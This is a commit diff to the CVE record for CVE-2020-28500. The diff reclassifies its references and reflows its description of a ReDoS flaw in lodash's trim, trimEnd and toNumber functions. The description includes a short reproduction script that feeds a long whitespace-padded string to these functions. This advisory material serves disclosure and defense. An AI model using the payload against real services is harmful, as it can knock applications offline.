"-Synchronized-Data."

2025-06-12 02:05:39 +00:00 · 2021-02-15 12:00:41 +00:00 · 2021-02-15 12:00:41 +00:00 · 8cbc795e18
commit 8cbc795e18
parent ea81c4f7a9
1 changed files with 25 additions and 17 deletions
--- a/2020/28xxx/CVE-2020-28500.json
+++ b/2020/28xxx/CVE-2020-28500.json
@ -66,36 +66,44 @@
    "references": {
        "reference_data": [
            {
-                "refsource": "CONFIRM",
-                "url": "https://snyk.io/vuln/SNYK-JS-LODASH-1018905"
+                "refsource": "MISC",
+                "url": "https://snyk.io/vuln/SNYK-JS-LODASH-1018905",
+                "name": "https://snyk.io/vuln/SNYK-JS-LODASH-1018905"
            },
            {
-                "refsource": "CONFIRM",
-                "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892"
+                "refsource": "MISC",
+                "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892",
+                "name": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892"
            },
            {
-                "refsource": "CONFIRM",
-                "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893"
+                "refsource": "MISC",
+                "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893",
+                "name": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893"
            },
            {
-                "refsource": "CONFIRM",
-                "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894"
+                "refsource": "MISC",
+                "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894",
+                "name": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894"
            },
            {
-                "refsource": "CONFIRM",
-                "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895"
+                "refsource": "MISC",
+                "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895",
+                "name": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895"
            },
            {
-                "refsource": "CONFIRM",
-                "url": "https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896"
+                "refsource": "MISC",
+                "url": "https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896",
+                "name": "https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896"
            },
            {
-                "refsource": "CONFIRM",
-                "url": "https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8"
+                "refsource": "MISC",
+                "url": "https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8",
+                "name": "https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8"
            },
            {
-                "refsource": "CONFIRM",
-                "url": "https://github.com/lodash/lodash/pull/5065"
+                "refsource": "MISC",
+                "url": "https://github.com/lodash/lodash/pull/5065",
+                "name": "https://github.com/lodash/lodash/pull/5065"
            }
        ]
    },
@ -103,7 +111,7 @@
        "description_data": [
            {
                "lang": "eng",
-                "value": "All versions of package lodash; all versions of package org.fujion.webjars:lodash are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.\r\n\r\n\r\nSteps to reproduce (provided by reporter Liyuan Chen):\r\n\r\nvar lo = require('lodash');\r\n\r\nfunction build_blank (n) {\r\nvar ret = \"1\"\r\nfor (var i = 0; i < n; i++) {\r\nret += \" \"\r\n}\r\n\r\nreturn ret + \"1\";\r\n}\r\n\r\nvar s = build_blank(50000)\r\nvar time0 = Date.now();\r\nlo.trim(s)\r\nvar time_cost0 = Date.now() - time0;\r\nconsole.log(\"time_cost0: \" + time_cost0)\r\n\r\nvar time1 = Date.now();\r\nlo.toNumber(s)\r\nvar time_cost1 = Date.now() - time1;\r\nconsole.log(\"time_cost1: \" + time_cost1)\r\n\r\nvar time2 = Date.now();\r\nlo.trimEnd(s)\r\nvar time_cost2 = Date.now() - time2;\r\nconsole.log(\"time_cost2: \" + time_cost2)\r\n\n"
+                "value": "All versions of package lodash; all versions of package org.fujion.webjars:lodash are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = \"1\" for (var i = 0; i < n; i++) { ret += \" \" } return ret + \"1\"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log(\"time_cost0: \" + time_cost0) var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log(\"time_cost1: \" + time_cost1) var time2 = Date.now(); lo.trimEnd(s) var time_cost2 = Date.now() - time2; console.log(\"time_cost2: \" + time_cost2)"
            }
        ]
    },